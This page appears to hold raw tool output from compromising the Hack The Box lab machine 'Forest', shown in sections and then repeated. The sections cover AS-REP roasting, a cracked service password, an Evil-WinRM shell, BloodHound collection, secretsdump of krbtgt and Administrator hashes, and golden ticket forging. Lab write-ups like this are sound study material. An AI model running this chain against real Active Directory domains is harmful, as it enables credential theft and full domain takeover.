Mitchell Moser mitchmoser

## Forest Golden Ticket Administrator
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for htb.local/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart

## Forest secretsdump.py krbtgt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
[*] Cleaning up...

## Forest secretsdump.py Administrator
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Cleaning up...

## Forest Python BloodHound
INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 75 groups
INFO: Found 0 trusts

## Forest User.txt
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir C:\Users\svc-alfresco\Desktop\user.txt


    Directory: C:\Users\svc-alfresco\Desktop


## Forest John Hash Crack
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:04 DONE (2020-03-22 13:39) 0.2207g/s 901933p/s 901933c/s 901933C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

## Forest GetNPUsers
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2020-03-26 23:40:39.044925  2020-03-26 20:23:12.568590  0x410200


$krb5asrep$23$svc-alfresco@HTB.LOCAL:b3267a6ae9aa9e65e8420f161d843772$586e8db69f3b75d97cec66be5659031ace5f68e7e475ff8a3ad0a691a465c0d1d3ed714381bfc535c3e31093c5d55da18a9414ffb5e845fd525ee6e2e75b74f1d40ac19fa54fc1d627ace3fb6c3ab22cc4220cbc32a85ce13752fcf38e47e770b4418a2b5e02b13e62bbd9608b7eaf83d13c0fe589b0b2a4cd4eb25056a3c6e20e713eea3cdf98c7269359ae66afa6b7a640f94c46b37270f43cecb7b52d84c45e44f2943ac89beb7113be8382d974ddb578ae7a0da696b501902a1536547d59f17363b27a6f6a886464bb8b8b2096fe046b1773edeafa016b9e2427cce1bc060df4a82e1510

## Forest rpcclient svc-alfresco
rpcclient $> queryusergroups 0x47b
        group rid:[0x201] attr:[0x7]
        group rid:[0x47c] attr:[0x7]

rpcclient $> querygroup 0x201
        Group Name:     Domain Users
        Description:    All domain users
        Group Attribute:7
        Num Members:30

## Forest rpcclient enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]

## Forest Crackmapexec Users
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:HTB) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [-] HTB\: STATUS_ACCESS_DENIED
SMB         10.10.10.161    445    FOREST           [+] Enumerated domain user(s)
SMB         10.10.10.161    445    FOREST           htb.local\Administrator                  badpwdcount: 0 baddpwdtime: 2019-09-22 18:30:53.383284
SMB         10.10.10.161    445    FOREST           htb.local\Guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         10.10.10.161    445    FOREST           htb.local\DefaultAccount                 badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         10.10.10.161    445    FOREST           htb.local\krbtgt                         badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         10.10.10.161    445    FOREST           htb.local\$331000-VK4ADACQNUCA           badpwdcount: 0 baddpwdtime: 1600-12-31 19:03
	[*] Creating basic skeleton ticket and PAC Infos
	[*] Customizing ticket for htb.local/Administrator
	[*] PAC_LOGON_INFO
	[*] PAC_CLIENT_INFO_TYPE
	[*] EncTicketPart
	[*] EncAsRepPart
	[*] Signing/Encrypting final ticket
	[*] PAC_SERVER_CHECKSUM
	[*] PAC_PRIVSVR_CHECKSUM
	[*] EncTicketPart
	Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

	[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
	[*] Using the DRSUAPI method to get NTDS.DIT secrets
	krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
	[*] Kerberos keys grabbed
	krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
	krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
	krbtgt:des-cbc-md5:9dd5647a31518ca8
	[*] Cleaning up...
	INFO: Found AD domain: htb.local
	INFO: Connecting to LDAP server: FOREST.htb.local
	INFO: Found 1 domains
	INFO: Found 1 domains in the forest
	INFO: Found 2 computers
	INFO: Connecting to LDAP server: FOREST.htb.local
	WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
	INFO: Found 31 users
	INFO: Found 75 groups
	INFO: Found 0 trusts
	Evil-WinRM shell v2.3

	Info: Establishing connection to remote endpoint

	Evil-WinRM PS C:\Users\svc-alfresco\Documents> dir C:\Users\svc-alfresco\Desktop\user.txt


	Directory: C:\Users\svc-alfresco\Desktop
	Using default input encoding: UTF-8
	Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
	Will run 4 OpenMP threads
	Press 'q' or Ctrl-C to abort, almost any other key for status
	s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
	1g 0:00:00:04 DONE (2020-03-22 13:39) 0.2207g/s 901933p/s 901933c/s 901933C/s s401447401447401447..s3r2s1
	Use the "--show" option to display all of the cracked passwords reliably
	Session completed
	Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

	Name MemberOf PasswordLastSet LastLogon UAC
	------------ ------------------------------------------------------ -------------------------- -------------------------- --------
	svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-03-26 23:40:39.044925 2020-03-26 20:23:12.568590 0x410200



	$krb5asrep$23$svc-alfresco@HTB.LOCAL:b3267a6ae9aa9e65e8420f161d843772$586e8db69f3b75d97cec66be5659031ace5f68e7e475ff8a3ad0a691a465c0d1d3ed714381bfc535c3e31093c5d55da18a9414ffb5e845fd525ee6e2e75b74f1d40ac19fa54fc1d627ace3fb6c3ab22cc4220cbc32a85ce13752fcf38e47e770b4418a2b5e02b13e62bbd9608b7eaf83d13c0fe589b0b2a4cd4eb25056a3c6e20e713eea3cdf98c7269359ae66afa6b7a640f94c46b37270f43cecb7b52d84c45e44f2943ac89beb7113be8382d974ddb578ae7a0da696b501902a1536547d59f17363b27a6f6a886464bb8b8b2096fe046b1773edeafa016b9e2427cce1bc060df4a82e1510
	rpcclient $> queryusergroups 0x47b
	group rid:[0x201] attr:[0x7]
	group rid:[0x47c] attr:[0x7]

	rpcclient $> querygroup 0x201
	Group Name: Domain Users
	Description: All domain users
	Group Attribute:7
	Num Members:30
	user:[Administrator] rid:[0x1f4]
	user:[Guest] rid:[0x1f5]
	user:[krbtgt] rid:[0x1f6]
	user:[DefaultAccount] rid:[0x1f7]
	user:[$331000-VK4ADACQNUCA] rid:[0x463]
	user:[SM_2c8eef0a09b545acb] rid:[0x464]
	user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
	user:[SM_75a538d3025e4db9a] rid:[0x466]
	user:[SM_681f53d4942840e18] rid:[0x467]
	user:[SM_1b41c9286325456bb] rid:[0x468]
	SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:HTB) (signing:True) (SMBv1:True)
	SMB 10.10.10.161 445 FOREST [-] HTB\: STATUS_ACCESS_DENIED
	SMB 10.10.10.161 445 FOREST [+] Enumerated domain user(s)
	SMB 10.10.10.161 445 FOREST htb.local\Administrator badpwdcount: 0 baddpwdtime: 2019-09-22 18:30:53.383284
	SMB 10.10.10.161 445 FOREST htb.local\Guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
	SMB 10.10.10.161 445 FOREST htb.local\DefaultAccount badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
	SMB 10.10.10.161 445 FOREST htb.local\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
	SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA badpwdcount: 0 baddpwdtime: 1600-12-31 19:03